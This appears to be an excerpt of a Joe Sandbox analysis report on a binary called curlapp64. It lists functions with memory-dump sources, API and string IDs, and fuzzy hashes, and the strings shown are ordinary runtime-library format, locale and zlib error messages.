                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                  • Opcode ID: 8fb0cf93fba7cfb2a4f20eac4153e253e84e23997175e6890aa831645548a656
                                                                                                                                                                                                  • Instruction ID: aa74916cbb5c536ffd61dc001a401a2253296be0d411b559b1f6d27bfeaf81b6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fb0cf93fba7cfb2a4f20eac4153e253e84e23997175e6890aa831645548a656
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64D0C964E0AB0388EA949B5DAC8917D32F4AF49F80F800834C25D89330DE2C60A5C325
                                                                                                                                                                                                  Function 00007FF8B7E9C2D0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ioctlsocket
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3577187118-0
                                                                                                                                                                                                  • Opcode ID: 6a6e5c2baaee02c14a4862300e1e534eccd1fb5847dbe05d4c8c646c8366030d
                                                                                                                                                                                                  • Instruction ID: 5db864acb65072d0e71a492e70fb6457a77051cf78d6bbe0ceed7d6654e2c180
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a6e5c2baaee02c14a4862300e1e534eccd1fb5847dbe05d4c8c646c8366030d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CC01256E246818283485F75548508BA6B1AB84644F955425D20641134DD3CC2A98A40
                                                                                                                                                                                                  Function 00007FF8B7E9FEC0 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                                                                                  • Opcode ID: 61ce7c71b359922bf70661d37482ef1cbf245bc6e1db0f0ea117e0447321ee61
                                                                                                                                                                                                  • Instruction ID: 7a552afc32ce5fff9c89df29ca9fd6e9b378ff0adef505f77f1b6c59bea9b2ab
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61ce7c71b359922bf70661d37482ef1cbf245bc6e1db0f0ea117e0447321ee61
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53D02B92B28B4141DB2855B7F6874AE94429F59FC0F08D034EF098B79EDC2CC1810700

                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                  Function 00007FF8B9F6E24C Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 313767242-0
                                                                                                                                                                                                  • Opcode ID: f881db69f7aac02742724b58b026e68039e3f4162e1a059bda2682f6cfa32fcf
                                                                                                                                                                                                  • Instruction ID: 14ea97659a3b2c7bf8e9f4cf858c622dc2e09a1c984aa051102f0cddc9075928
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f881db69f7aac02742724b58b026e68039e3f4162e1a059bda2682f6cfa32fcf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B315D72A08BC196EB608F64E8803EE7761FB84799F04503ADB4E47B98DF38D558C710
                                                                                                                                                                                                  Function 00007FF6CF9C05E8 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 231COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: NameTranslate$CodeInfoLocalePageValid_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: utf8$ZYo
                                                                                                                                                                                                  • API String ID: 2487361160-2993546575
                                                                                                                                                                                                  • Opcode ID: 34cccc52e21ccf182b2682d1341dbb0482f96e1963a4f2efc55d2886cd143326
                                                                                                                                                                                                  • Instruction ID: b1700879b8f654004a0d8748c2a1c390dd558244fdc9ab3c457891c88ac07e35
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34cccc52e21ccf182b2682d1341dbb0482f96e1963a4f2efc55d2886cd143326
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5091B036A0874285EF64AF2295402BA27A4FF84B86F448131DACDC37ABDF3DE555C760
                                                                                                                                                                                                  Function 00007FF6CF9C1048 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Locale$InfoValid$CodeDefaultEnumLocalesPageSystemUser
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 3082464267-278324492
                                                                                                                                                                                                  • Opcode ID: eb1cdc4e41f491258aa06c65caae35cfc640384752c5aa504665f3f7de12368f
                                                                                                                                                                                                  • Instruction ID: fb53ece8e11db29839b9b8b0686d0c87d839020dc3854ab3caf5f054439c7200
                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb1cdc4e41f491258aa06c65caae35cfc640384752c5aa504665f3f7de12368f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A714732F1864289FF61AF61D8506B823B0BF44B86F454535CA8E9379AEF3CE585C364
                                                                                                                                                                                                  Function 00007FF6CF9B158C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 1239891234-278324492
                                                                                                                                                                                                  • Opcode ID: 81ea5553921764c7ffe6b693d444253d0fad13827777ee08f1dfa98647d140be
                                                                                                                                                                                                  • Instruction ID: 2ac7d83acaed8baf8e9f1e430fb4136ceae9ecd58abbc1b15ec27b2b0a0c18b5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81ea5553921764c7ffe6b693d444253d0fad13827777ee08f1dfa98647d140be
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C417E32A18B8186EB60DF25E8443AE77A4FB88755F540135EACE87B99DF3CC155CB10
                                                                                                                                                                                                  Function 00007FF6CF9A491C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                  • Opcode ID: 7af368e7026b6201f9f4e8030217bcf5bf43ab111fe782fafec2d5b40c989550
                                                                                                                                                                                                  • Instruction ID: a7dbc6f969b91865a9b80e870fcf42eb658cdd5cf1ebce86bbf93be1ba14212c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7af368e7026b6201f9f4e8030217bcf5bf43ab111fe782fafec2d5b40c989550
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E311272A05B818AEB609F64E8447ED7764FB84745F444039DB8E87B99DF38D548C720
                                                                                                                                                                                                  Function 00007FF6CF998240 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 302COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: $6$@$ZYo
                                                                                                                                                                                                  • API String ID: 3668304517-2667307075
                                                                                                                                                                                                  • Opcode ID: cafaf49ce4991ddd5bb66c3a8ae44f50c4af8d24662297efd5b63517c1891540
                                                                                                                                                                                                  • Instruction ID: b5a1a995c090c6d03a783aad2cfccc5918262dd621772e309ef736fe457a17fe
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cafaf49ce4991ddd5bb66c3a8ae44f50c4af8d24662297efd5b63517c1891540
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4BB12973B206648AEB04CF65C85167C3BE1F389745F85822AEEAA977C6DE3DD140C750
                                                                                                                                                                                                  Function 00007FF6CF9C0E50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                  • Opcode ID: 025e3f2041bf02e8063c12f52691db8c575edefdaf525a3261195542c091d8ee
                                                                                                                                                                                                  • Instruction ID: ac1af6cc8770072cd3907d0aafd3471c92cf053d74b6c2ce09548b20a1991c09
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 025e3f2041bf02e8063c12f52691db8c575edefdaf525a3261195542c091d8ee
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E113021A5864382FF65AF55A54057A7360FF44786F044035EACAC3AAFDF2CE841C760
                                                                                                                                                                                                  Function 00007FF6CF9C0AB4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale$_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 4006003004-278324492
                                                                                                                                                                                                  • Opcode ID: 3b142d717eddeb14692a986b8d7bf9ed6abdc056a08e85e2da040620a65cfd0f
                                                                                                                                                                                                  • Instruction ID: 74dcf7dd15cdfa214944a4265d4584a41c52103ca20550873bbad301684a7904
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b142d717eddeb14692a986b8d7bf9ed6abdc056a08e85e2da040620a65cfd0f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58618B32A086428AEF34AF15D5806B973A0FB44746F448135CBDEC36AADF3CE591C720
                                                                                                                                                                                                  Function 00007FF8B9F67944 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                  • API String ID: 0-1127688429
                                                                                                                                                                                                  • Opcode ID: 83de305d40d586b13aa6c85dcc0d975829e5936a5db0c4d3bae066d29995b2a7
                                                                                                                                                                                                  • Instruction ID: 02c2e1d926f213893451d498cc6c65ad89ca3bb4847405cc766960f355fa111c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83de305d40d586b13aa6c85dcc0d975829e5936a5db0c4d3bae066d29995b2a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09F18372A183D58BEBA58F1DC488A3E7AE9FF457A1F056538DB49473A4CB38E940C740
                                                                                                                                                                                                  Function 00007FF6CF99C820 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 64COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for bool$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type for wchar_t$Invalid presentation type specifier$Invalid type specification.$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                                                                                  • API String ID: 909987262-1539746584
                                                                                                                                                                                                  • Opcode ID: 573299431265efdd850d425cac7f6f74e29878a269e9f63eddfeedbd983a4db3
                                                                                                                                                                                                  • Instruction ID: e3d64d69e8277d2989c9eb690ce4d18b6ef5b32f1bc5da07d7df5d4cb78f260d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 573299431265efdd850d425cac7f6f74e29878a269e9f63eddfeedbd983a4db3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED218312D0C5464AFF45AF24DC964B92770AFE2302FA24432E2DDC26BBDD1DA596C331
                                                                                                                                                                                                  Function 00007FF6CF991C10 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 56COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for bool$Invalid presentation type for char$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type specifier$Invalid type specification.$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                                                                                  • API String ID: 909987262-3157939077
                                                                                                                                                                                                  • Opcode ID: b6f603e07c54b3e44ff84907a074fce9d505c7cef7bbcbdd899f8c035c6bee26
                                                                                                                                                                                                  • Instruction ID: 2642f296322a52aeef201899fd4d2239f8bec91210229620e2e3f57ab9f3aa01
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6f603e07c54b3e44ff84907a074fce9d505c7cef7bbcbdd899f8c035c6bee26
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10114D11D1C5424AFF45AF24DC964F92770AFA2342FA20432E1DEC25AFDD1DA689C771
                                                                                                                                                                                                  Function 00007FF6CF991010 Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 282COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Format specifier requires numeric argument.$Format specifier requires numeric or pointer argument.$Invalid fill (too long).$Invalid format string.$Missing precision specifier.$Number is too big$Precision not allowed for this argument type.$invalid fill character '{'$ZYo
                                                                                                                                                                                                  • API String ID: 909987262-1137748110
                                                                                                                                                                                                  • Opcode ID: 4ecfc1aeadaa9003144cd881bd739515368904f19df2c6ffd4d8165f49351257
                                                                                                                                                                                                  • Instruction ID: 74500fc630019deb2a046e30cd008860fc5cde094b2bb7f6954942dbc4aede9f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ecfc1aeadaa9003144cd881bd739515368904f19df2c6ffd4d8165f49351257
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48B1A212A0C69649FE60DF15C4552BD2BB1AB51B82F4B8036C6DD837DBDE2DE6C2C321
                                                                                                                                                                                                  Function 00007FF6CF99B2B0 Relevance: 26.6, APIs: 7, Strings: 8, Instructions: 317COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
